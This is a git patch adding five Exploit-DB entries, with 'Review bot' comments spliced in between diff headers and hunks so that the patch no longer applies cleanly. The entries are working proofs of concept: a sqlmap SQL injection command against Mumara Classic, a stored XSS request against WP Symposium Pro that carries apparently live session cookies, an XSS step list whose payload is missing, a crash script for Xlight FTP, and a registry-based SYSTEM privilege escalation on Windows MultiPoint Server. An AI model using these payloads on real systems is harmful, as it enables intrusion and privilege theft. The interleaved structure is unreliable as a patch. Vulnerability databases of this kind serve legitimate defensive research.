From a7e24bac978cb6807ab86db5b72f39d7b85afe22 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 13 Nov 2021 05:02:11 +0000
Subject: [PATCH] DB: 2021-11-13 5 changes to exploits/shellcodes Xlight FTP 3.9.3.1 - Buffer Overflow (PoC) Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
---
 exploits/multiple/webapps/50518.txt | 18 +++++++
 exploits/php/webapps/50514.txt | 37 +++++++++++++
 exploits/php/webapps/50515.txt | 18 +++++++
 exploits/windows/dos/50516.py | 32 ++++++++++++
 exploits/windows/local/50517.txt | 80 +++++++++++++++++++++++++++++
 files_exploits.csv | 5 ++
 6 files changed, 190 insertions(+)
 create mode 100644 exploits/multiple/webapps/50518.txt
 create mode 100644 exploits/php/webapps/50514.txt
 create mode 100644 exploits/php/webapps/50515.txt
 create mode 100755 exploits/windows/dos/50516.py
 create mode 100644 exploits/windows/local/50517.txt
diff --git a/exploits/multiple/webapps/50518.txt b/exploits/multiple/webapps/50518.txt
new file mode 100644
index 000000000..6a1d3875a
--- /dev/null
+++ b/exploits/multiple/webapps/50518.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
+# Date: 2021-11-11
+# Exploit Author: (v0yager) Shain Lakin
+# Vendor Homepage: https://mumara.com
+# Version: <= 2.93
+# Tested on: CentOS 7
+
+-==== Vulnerability ====-
+
+An SQL injection vulnerability in license_update.php in Mumara Classic
+through 2.93 allows a remote unauthenticated attacker to execute
+arbitrary SQL commands via the license parameter.
+
+-==== POC ====-
+
+Using SQLMap:
+
+sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql
\ No newline at end of file
diff --git a/exploits/php/webapps/50514.txt b/exploits/php/webapps/50514.txt
new file mode 100644
index 000000000..69a3434d8
--- /dev/null
+++ b/exploits/php/webapps/50514.txt
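Review bot: The header and description call the issue unauthenticated, yet the only reproduction given passes a fixed `PHPSESSID` cookie, and the text never says whether license_update.php needs any session at all or whether that value is an arbitrary placeholder (its form suggests the latter). The writeup should state the precondition explicitly, since that is what a defender uses to rate exposure. It would also help to say whether the endpoint stays reachable after installation completes or only during setup, and to record the vendor fix status, neither of which the text covers.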
@@ -0,0 +1,37 @@
+# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
+# Date: 11/11/2021
+# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
+# Vendor Homepage: http://www.wpsymposiumpro.com/
+# Software Link: https://wordpress.org/plugins/wp-symposium-pro/
+# Version: 2021.10
+# Tested on : Windows 10
+#Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label.
+
+#Poc:
+
+POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 129
+Origin: http://localhost
+Connection: close
+Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test
+
+
+----------------------------------------------------------------------------------
+
+
+
+## After adding new forum, 
click created forum and pop-up will be on the screen.
\ No newline at end of file
diff --git a/exploits/php/webapps/50515.txt b/exploits/php/webapps/50515.txt
new file mode 100644
index 000000000..d0fb25747
--- /dev/null
+++ b/exploits/php/webapps/50515.txt
@@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
+# Date: 11/12/2021
+# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
+# Vendor Homepage: https://accesspressthemes.com/
+# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
+# Version: 1.8.2
+# Tested on : Windows 10
+
+#Poc:
+
+1. Install Latest WordPress
+2. Install and activate AccessPress Social Icons 1.8.2
+3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields.
+4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list".
+
+
+
+4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.
\ No newline at end of file
diff --git a/exploits/windows/dos/50516.py b/exploits/windows/dos/50516.py
new file mode 100755
index 000000000..07beb4196
--- /dev/null
+++ b/exploits/windows/dos/50516.py
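Review bot: The `Cookie:` header in the PoC request carries what look like live `wordpress_` and `wordpress_logged_in_` session values from the tester's instance; advisories should redact those and substitute an obvious placeholder. The request goes to `/wp-admin/admin.php?page=wps_pro_setup` under an admin login, so the writeup should state plainly that storing the payload requires administrator privileges and which users later see the rendered forum name, since that fixes the real impact of the finding. The `#Description:` header also lacks the space after `#` that the other header fields use.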
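Review bot: Step 4 says to enter the "JavaScript payload which is mentioned below", but no payload, request or field value follows, so the reproduction steps are incomplete as written; the author should include the exact value used (or a clearly marked placeholder) and name the page where the stored title is rendered. The closing step is numbered `4.` a second time and should be `5.`. There is also no `Description:` header, so the affected field and the missing sanitization of 'icon title' appear only inside the steps.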
@@ -0,0 +1,32 @@
+# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-12
+# Vendor Homepage: https://www.xlightftpd.com/
+# Software Link: https://www.xlightftpd.com/download/setup.exe
+# Tested Version: 3.9.3.1
+# Vulnerability Type: Buffer Overflow Local
+# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)
+
+# Steps to reproduce:
+# 1. - Download and Xlight FTP
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open Xlight FTP 3.9.3.1
+# 4. - "File and Directory - Access Control List - Setup - Added users list directories
+# 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied
+# 6. - Go to Setup -> added -> Enter new Item - Paste the characters
+# 7 - Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 550
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
diff --git a/exploits/windows/local/50517.txt b/exploits/windows/local/50517.txt
new file mode 100644
index 000000000..e0479807e
--- /dev/null
+++ b/exploits/windows/local/50517.txt
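Review bot: The bare `except:` at the end of the script swallows every exception, including KeyboardInterrupt, and reports only "POC not created" with no reason; and because `file.close()` sits inside the `try`, a failed write leaves the handle open. Replace the open/write/close with `with open("exploit.txt", "w") as out:` / `out.write(exploit)` and narrow the clause to `except OSError as exc:`, printing `exc` in the failure message. The `#!/usr/bin/python` shebang is on line 21 of the file rather than line 1, so the loader ignores it; move it to the top or drop it. `file` also shadows the Python 2 builtin of the same name, which matters for a script that advertises a `/usr/bin/python` interpreter.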
@@ -0,0 +1,80 @@
+# Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
+# Date: 11/11/2021
+# Exploit Author: it
+# Vendor Homepage: https://www.microsoft.com
+# Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518
+# Version: Version 6.1 Compilation 7601 Service Pack 1
+# Tested on: Microsoft Windows MultiPoint Server 2011 - English Version
+
+Description
+Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade
+
+Vulnerable: |Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache
+
+Vulnerability Type: Privilege Escalation
+
+Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Compilation 7601 Service Pack 1
+
+Language OS: English
+
+The Vulnerability
+
+Clément wrote a very useful permissions-checking tool for Windows that
+find various misconfigurations in Windows that could allow a local
+attacker to elevate their privileges. On a typical Windows 7 and
+Server 2008 R2 machine, the tool found that all local users have write
+permissions on two registry keys:
+
+HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
+
+HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
+
+These didn't immediately seem exploitable, but Clément did the legwork
+and found the Windows Performance Monitoring mechanism can be made to
+read from these keys - and eventually load the DLL provided by the
+local attacker. To most everyone's surprise, not as the local user,
+but as Local System.
+
+In short, a local non-admin user on the computer just creates a
+Performance subkey in one of the above keys, populates it with some
+values, and triggers performance monitoring, which leads to a Local
+System WmiPrvSE.exe process loading attacker's DLL and executing code
+from it.
+
+About Artiche: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
+I detected that in another version of windows it is also vulnerable,
+Windows Multipoint 2011, which can affect customers who use extended
+license;
+
+I can't say if there are any other vulnerable unpublished versions
+besides the ones I've posted here
+
+How to Produce Exploitation
+
+Compile Exploit Perfusion in Visual Studio 2019 - Open Project, Make
+Release x64 and Compile.
+
+Is necessary install microsoft visual c++ redistributable on Windows
+MultiPoint 2011 for execute exploit
+
+The exploit Add Subkeys in
+
+HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
+
+HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance
+
+Library = Name of your performance DLL
+
+Open = Name of your Open function in your DLL
+
+Collect = Name of your Collect function in your DLL
+
+Close = Name of your Close function in your DLL
+
+and Exploit Write payload dll hijacking, call dll with permission SYSTEM using WMI
+
+Tools and Exploit:
+https://github.com/itm4n/PrivescCheck
+
+Exploit:
+https://github.com/itm4n/Perfusion
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b85795061..51e282810 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
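Review bot: The Exploit Title and the Description line spell the service `Dnschade`, while the `Vulnerable:` line and both registry paths give `Dnscache`; the same misspelling is carried into the 50517 row added in the second files_exploits.csv hunk, so the entry will not be found by anyone searching for the real service name, and the title should be corrected to `Dnscache`. The header's `Exploit Author: it` also disagrees with the index row, which credits `Marcio Mendes`. For readers assessing exposure, the writeup should say outright that the root weakness is the write permission all local users hold on `HKLM\SYSTEM\CurrentControlSet\Services\Dnscache` and `HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper`, so auditing and tightening those key ACLs and alerting on creation of a `Performance` subkey beneath them is the defensive check; the text only implies this through the exploitation narrative.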
@@ -6805,6 +6805,7 @@ id,file,description,date,author,type,platform,port
 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
 50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -11415,6 +11416,7 @@ id,file,description,date,author,type,platform,port
 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
+50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44611,3 +44613,6 @@ id,file,description,date,author,type,platform,port
 50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
 50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
 50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
+50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
+50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
+50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,